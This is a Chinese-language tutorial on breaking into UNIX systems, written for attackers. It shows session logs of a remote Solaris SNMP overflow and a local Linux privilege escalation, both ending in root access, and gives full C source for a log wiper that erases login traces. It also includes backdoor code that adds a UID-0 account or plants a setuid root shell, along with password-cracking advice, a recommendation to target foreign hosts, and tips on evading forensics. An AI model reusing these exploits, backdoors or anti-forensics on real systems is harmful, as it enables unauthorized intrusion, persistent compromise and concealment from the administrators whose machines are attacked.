如何入侵UNIX

Unix的架構(gòu)很?chē)?yán)密，權(quán)限管理很?chē)?yán)，要想入侵Unix，必須要突破權(quán)限關(guān)，下面是學(xué)習(xí)啦小編整理的一些關(guān)于UNIX入侵的相關(guān)資料，供你參考。

什么是UNIX?

NIX操作系統(tǒng)(尤尼斯)，是一個(gè)強(qiáng)大的多用戶(hù)、多任務(wù)操作系統(tǒng)，支持多種處理器架構(gòu)，按照操作系統(tǒng)的分類(lèi)，屬于分時(shí)操作系統(tǒng)，最早由KenThompson、Dennis Ritchie和Douglas McIlroy于1969年在AT&T的貝爾實(shí)驗(yàn)室開(kāi)發(fā)。目前它的商標(biāo)權(quán)由國(guó)際開(kāi)放標(biāo)準(zhǔn)組織所擁有，只有符合單一UNIX規(guī)范的UNIX系統(tǒng)才能使用UNIX這個(gè)名稱(chēng)，否則只能稱(chēng)為類(lèi)UNIX(UNIX-like)。

一：基本知識(shí)

1：常見(jiàn)UNIX版本：

SCO UNIX,Sunos,Solaris,HP-UX,Digtal,Unix,IRIX,AIX,Linux,FreeBSD, 386BSD,A/UX,BSD,BSD-LITE,Goherent,Dynix,Hurd(GNN),InTeractive,Mach,Minix,Mks Toolkit,NetNSD,OSF/I,System V Unix,Unicos,Unix ware...

2:簡(jiǎn)單介紹幾個(gè)

sunos&solaris SUN本來(lái)想用solaris取代sunos，不過(guò)在用戶(hù)的要求下，到目前為止，還是維持兩者并存的政策;

Freebsd是著名的BSD-UNIX的一的繼承者，是UNIX眾多分支中相當(dāng)穩(wěn)定的一個(gè)，很多ISP均使用運(yùn)行Freebsd;

Linux是一個(gè)面對(duì)PC機(jī)個(gè)人用戶(hù)的自由廉價(jià)的UNIX產(chǎn)品(其硬件平臺(tái)是Intel系列的CPU)，實(shí)際上眾多的網(wǎng)絡(luò)管理員真正使用的是Linux。

3：UNIX操作系統(tǒng)的特點(diǎn)

(1)多用戶(hù)和多任務(wù);(2)可移植性;(3)樹(shù)行結(jié)構(gòu)的文件系統(tǒng);(4)I/O重定向技術(shù)和管道技術(shù);(5)豐富的實(shí)用程序;(6)每個(gè)用戶(hù)都有電子郵件。

4：尤為突出的優(yōu)點(diǎn)

(1)穩(wěn)定可靠性高;(2)網(wǎng)絡(luò)功能強(qiáng);(3)開(kāi)發(fā)性好;(4)強(qiáng)大的數(shù)據(jù)庫(kù)支持功能;(5)伸縮性強(qiáng)。

二：入侵目的

1：學(xué)習(xí)UNIX，熟悉內(nèi)部操作，整體配置...

2：做跳板或以此捕捉更多UNIX肉雞;

3：越權(quán)得到某些正常請(qǐng)求下得不到的東西;

4：攻擊破壞或以此作為利器來(lái)破壞其他系統(tǒng);

5：更多......

三：入侵方法

1：尋找目標(biāo) 工具：supperscan，流光，LANguard Network Scanner 2.0或者其他，憑個(gè)人喜好選用

supperscan：掃描23，79端口，注意含%，#，&...主機(jī)，這些就是UNIX;

LANguard..作簡(jiǎn)單設(shè)置，即可開(kāi)始，判斷對(duì)方操作系統(tǒng)功能乃同類(lèi)軟件中的精品，直觀準(zhǔn)確;

流光：利用高級(jí)掃描，選telnet，PRC，POP3，F(xiàn)TP，F(xiàn)inger即可。

其他方法一樣...

(說(shuō)明：很多管理員為了迷惑入侵者往往故意更改telnet登陸時(shí)出現(xiàn)的信息，請(qǐng)注意識(shí)別) 2：開(kāi)始入侵 (1)溢出(所有關(guān)于UNIX的溢出，都需要在一個(gè)UNIX/Linux的環(huán)境下進(jìn)行編譯)

A：遠(yuǎn)程溢出

溢出?呵呵，太多了!隨便說(shuō)幾個(gè)：freebsd遠(yuǎn)程溢出，bind 遠(yuǎn)程溢出，Sun Solaris 5.7/5.8 Sparc遠(yuǎn)程溢出，redhat6.xrpc status遠(yuǎn)程溢出...自己去一一了解吧，在這里我簡(jiǎn)單說(shuō)兩個(gè)例子：

a1：考慮到很多朋友使用windows，所以大家可以參看我的兄弟---藍(lán)騎士的大作《freebsd溢出完全圖文版》(地址：http://www.itser.com/ez/.bbs/topic.cgi?forum=7&topic=25&show=)，因?yàn)檫@個(gè)溢出程序有已經(jīng)編譯好了可以直接在windows下使用;

a2:Sun Solaris 5.7 Sparc遠(yuǎn)程溢出

搜索...終于讓我找到了一臺(tái)sunos 5.7，上我一臺(tái)sunos 5.8

telnet 66.*.146.48 ----->>這是我的!

SunOS 5.8 login: ply

Password:

Last login: Tue Apr 23 03:55:09 from 39448.ddn.xaonli

Sun Microsystems Inc. SunOS 5.8 Generic February 2000

$ tmp/.sh ----->>當(dāng)時(shí)溢出時(shí)做的處理!

# ls

bin data etc initrd mnt proc sbin usr

boot dev home lib misc opt root tmp var

xfn skip

# cat >snmp.c ....... ----->>太長(zhǎng)了，省略...自己去找! # gcc -o snmp snmp.c ----->>用gcc編譯

snmp.c: In function `main':

snmp.c:181: warning: passing arg 3 of pointer to function from incompatible pointer type

snmp.c:181: warning: passing arg 4 of pointer to function from incompatible pointer type

snmp.c:181: warning: passing arg 5 of pointer to function from incompatible pointer type

# ls

bin data etc initrd mnt proc sbin snmp usr

boot dev home lib misc opt root snmp.c tmp var

# ./snmp

copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/

snmpXdmid for solaris 2.7 2.8 sparc usage: ./s address [-p port] -v 7|8

#./snmp 216.*.45.63 -v 7 ---->開(kāi)始溢出!!

DELIRIUM mar 2001 poland //lsd-pl.net/

snmpXdmid for solaris 2.7 2.8 sparc adr=0x000c8f68 timeout=30 port=928 connected!

sent!

SunOS app1-stg-bk-sh 5.7 Generic_106541-09 sun4u sparc SUNW,Ultra-80

id

uid=0(root) gid=0(root) ----->>是root哦!

echo "ply::0:0::/:/bin/bash" >> /etc/passwd ----->>加個(gè)用戶(hù)先!

echo "ply::::::::" >> /etc/shadow

... ----->>還想干什么就繼續(xù)吧! B：本地溢出

本地溢出需要一個(gè)具有Shell權(quán)限的帳號(hào)，這個(gè)帳號(hào)可以通過(guò)pop3或ftp弱密碼得到，照樣舉個(gè)例子：

流光掃描...一會(huì)兒得到了一個(gè)ftp帳號(hào)(webmaster，webmaster)，先telnet上去!

telnet *.174.62.135 Red Hat Linux release 6.2 (Cartman) ----->>linux 6.2,容易搞定!

Kernel 2.2.12-20kr2smp on an i686

login: webmaster

Password:

Last login: Wed Apr 24 02:21:58 from *.*.*.*

You have mail. ----->>這家伙有新郵件，不過(guò)我沒(méi)興趣!

[webmaster@ns webmaster]$ ----->>氣人的普通用戶(hù)$

[webmaster@ns webmaster]$cat >ts.c

... ----->>要學(xué)會(huì)利用網(wǎng)絡(luò)資源，自己找，當(dāng)是練習(xí)!

[webmaster@ns webmaster]$gcc -o ts ts.c ----->>還是用gcc編譯。

In file included from /usr/include/asm/user.h:5,

from /usr/include/linux/user.h:1,

from ts.c:30:

/usr/include/linux/ptrace.h:22: warning: `PTRACE_SYSCALL' redefined

/usr/include/sys/ptrace.h:103: warning: this is the location of the previous def

inition

[webmaster@ns webmaster]$ ls

Desktop/ Mail/ ts* ts.c

[webmaster@ns webmaster]$ ./ts

attached

bash# su root

[root@ns webmaster]# ----->>搞定，看見(jiàn)#我就高興!

[root@ns webmaster]# cat >wipe.c ----->>掃腳印的，這個(gè)還是給大家吧，否則有人要扁我了!

/*=============================================================================

UZAPPER Ver1.00 for Solaris, SunOS, IRIX, Linux, FreeBSD

The Shadow Penguin Security ( http://shadowpenguin.backsection.net )

Written by UNYUN ( unewn4th@usa.net )

=============================================================================

*/ #include

#include

#include

#include #ifdef UTMAXTYPE

#define UTMPX

#include

#endif

#include

#ifndef _PATH_LASTLOG

#include

#endif

#include

#include

#include #define SVR4_UTMP "/var/adm/utmp"

#define SVR4_WTMP "/var/adm/wtmp"

#define SVR4_LASTLOG "/var/adm/lastlog" #define SUNOS4_UTMP "/etc/utmp"

#define SUNOS4_WTMP "/usr/adm/wtmp"

#define SUNOS4_LASTLOG "/usr/adm/lastlog" #define BSD_UTMP "/var/run/utmp"

#define BSD_WTMP "/var/log/wtmp"

#define BSD_LASTLOG "/var/log/lastlog" #define MAX_FPATH 512 int wipe_log(path,user,type)

char *path,*user;

int type;

{

struct utmp utmp_ent;

#ifdef UTMPX

struct utmpx utmpx_ent;

#endif

void *ent;

char *un;

int sz,fd,c=0; if (strlen(path)==0) return(1);

if (type==0){

ent=(void *)&utmp_ent;

#ifdef UTMPX

un=(char *)&utmp_ent.ut_user;

#else

un=(char *)&utmp_ent.ut_name;

#endif

sz=sizeof(struct utmp);

}else{

#ifdef UTMPX

ent=(void *)&utmpx_ent;

un=(char *)&utmpx_ent.ut_user;

sz=sizeof(struct utmpx);

#endif

}

if ((fd=open(path,O_RDWR))<=0) return(-1);

while(read(fd,ent,sz)>0)

if (!strncmp(un,user,strlen(user))){

memset(ent,0,sz);

lseek(fd,-sz,SEEK_CUR);

write(fd,ent,sz);

c ;

}

close(fd);

printf("Wiped %d entries of %s from %s.\n",c,user,path);

return(0);

} int wipe_lastlog(path,user,type)

char *path,*user;

int type;

{

struct passwd *p;

struct lastlog ent;

int fd;

char buffer[MAX_FPATH]; if (type==0) strcpy(buffer,path);

else sprintf(buffer,"%s/%s",path,user);

memset(&ent,0,sizeof(struct lastlog));

if ((p=getpwnam(user))==NULL) return(-1);

if ((fd=open(buffer,O_RDWR))<=0) return(-2);

if (type==0)

lseek(fd,p->CNSU_uid*sizeof(struct lastlog),SEEK_SET);

write(fd,&ent,sizeof(struct lastlog));

close(fd);

printf("Wiped %s from %s.\n",user,path);

return(0);

} main(argc,argv)

int argc;

char *argv[];

{

char f_utmp[MAX_FPATH],f_utmpx[MAX_FPATH];

char f_wtmp[MAX_FPATH],f_wtmpx[MAX_FPATH];

char f_lastlog[MAX_FPATH];

struct utsname utname;

int lastlog_type; if (argc!=2){

printf("Usage: %s Usernane\n",argv[0]);

exit(1);

}

if (getpwnam(argv[1])==NULL){

printf("Unknown user : %s\n",argv[1]);

exit(1);

}

uname(&utname);

strcpy(f_wtmpx,""); strcpy(f_utmpx,"");

if (!strcmp(utname.sysname,"SunOS")){

#ifdef UTMPX

strcpy(f_utmp, SVR4_UTMP);

strcpy(f_wtmp, SVR4_WTMP);

strcpy(f_utmpx, UTMPX_FILE);

strcpy(f_wtmpx, WTMPX_FILE);

strcpy(f_lastlog, SVR4_LASTLOG);

lastlog_type=0;

#else

strcpy(f_utmp, SUNOS4_UTMP);

strcpy(f_wtmp, SUNOS4_WTMP);

strcpy(f_lastlog, SUNOS4_LASTLOG);

lastlog_type=0;

#endif

}else if (!strcmp(utname.sysname,"Linux")

|| !strcmp(utname.sysname,"FreeBSD")){

strcpy(f_utmp, BSD_UTMP);

strcpy(f_wtmp, BSD_WTMP);

strcpy(f_lastlog, BSD_LASTLOG);

}else if (!strcmp(utname.sysname,"IRIX")){

#ifdef UTMPX

strcpy(f_utmp, SVR4_UTMP);

strcpy(f_wtmp, SVR4_WTMP);

strcpy(f_utmpx, UTMPX_FILE);

strcpy(f_wtmpx, WTMPX_FILE);

strcpy(f_lastlog, SVR4_LASTLOG);

lastlog_type=1;

#else

printf("Can not wipe. System Unknown.\n");

#endif

}else

printf("Can not wipe. System Unknown.\n"); wipe_log(f_utmp, argv[1],0);

wipe_log(f_utmpx,argv[1],1);

wipe_log(f_wtmp, argv[1],0);

wipe_log(f_wtmpx,argv[1],1);

wipe_lastlog(f_lastlog,argv[1],lastlog_type);

}

^d [root@ns webmaster]# gcc -o wipe wipe.c

[root@ns webmaster]# ./wipe webmaster ----->>./wipe username就可以?huà)叩裟_印了! (2)掃描弱口令或暴力解除口令

A：弱口令使用于大范圍搜捕，即利用少量常見(jiàn)多用密碼去推測(cè)大量主機(jī)的telnet，ftp或pop3

B：暴力解除適用于針對(duì)某一主機(jī)，比如說(shuō)利用finger獲得了用戶(hù)列表，即可采用字典攻擊!或者說(shuō)利用其他漏洞(如phf漏洞)獲得了passwd，shadow文件，可以拿john或者亂刀解破，能否解破?看運(yùn)氣! (3)利用特洛伊木馬竊取口令(我沒(méi)有這么做過(guò)，但這不失為一種方法) (4)網(wǎng)絡(luò)監(jiān)聽(tīng)和數(shù)據(jù)截取(大家和我一起努力吧，努力學(xué)會(huì)利用這種方法:P) (5)這里給大家?guī)讉€(gè)簡(jiǎn)單的后門(mén)程序，復(fù)雜的自己去看!

a1:口令文件 passwd 中增加一個(gè) UID 為 0 的帳號(hào)

#include　 main()

{

FILE　*fd;

fd=fopen("/etc/passwd","a ");

fprintf(fd,"hax0r::0:0::/root:/bin/sh\n");

}

a2:在 /tmp 目錄下放置 suid shell

#include

main()

{

system("cp /bin/sh /tmp/fid");

system("chown root.root /tmp/fid");

system("chmod 4755 /tmp/fid");

}

a3:管理員偶然地輸入cd..時(shí)向/etc/passwd文件添加一個(gè)UID　0　帳號(hào)

#include

#include　 main()

{

FILE　*fd;

fd=fopen("/etc/passwd","a ");

fprintf(fd,"hax0r::0:0::/root:/bin/sh\n");

system("cd");

}

(6)攻擊(特別是溢出)的方式很多，但方法大多大同小異，故不再贅敘!

四：補(bǔ)充說(shuō)明

1：如用supperscan發(fā)現(xiàn)某ip段存在大量unix主機(jī)，馬上轉(zhuǎn)用弱口令解除;或發(fā)現(xiàn)某連續(xù)ip段全是同一個(gè)unix版本操作系統(tǒng)，則此ip段很有可能是某大公司，企業(yè)，高校或其他，一般防護(hù)甚嚴(yán)，不存在溢出漏洞，無(wú)需逐一嘗試溢出，隨便選兩三個(gè)試試看行不行;

2：到信息產(chǎn)業(yè)發(fā)達(dá)的國(guó)家去找，比如說(shuō)美國(guó)，日本...不要找國(guó)內(nèi)的，又少又危險(xiǎn)!

3：若發(fā)現(xiàn)telnet不上上次成功溢出的肉雞，說(shuō)明此肉雞的ip是動(dòng)態(tài)的，但ip改變不會(huì)太大，在臨近ip再搜一遍即可!

五：強(qiáng)調(diào)說(shuō)明

不要簡(jiǎn)單地認(rèn)為你已經(jīng)輕易地檫干凈了你的入侵痕跡，很多有經(jīng)驗(yàn)的管理員都把日志文件轉(zhuǎn)到了其他主機(jī)上或作相關(guān)安全處理，一旦管理員發(fā)現(xiàn)了入侵，他會(huì)從如下方面來(lái)分析攻擊者的入侵方式，你應(yīng)該以此做出相應(yīng)的應(yīng)對(duì)措施：

1：查找系統(tǒng)文件和系統(tǒng)培植文件的變化;

2：查找數(shù)據(jù)文件的變化;

3：查找入侵留下的數(shù)據(jù)文件和相關(guān)工具;

4：檢查日志文件

5：查找出網(wǎng)絡(luò)監(jiān)聽(tīng)的跡象

6：檢查局域網(wǎng)上的其他計(jì)算機(jī)。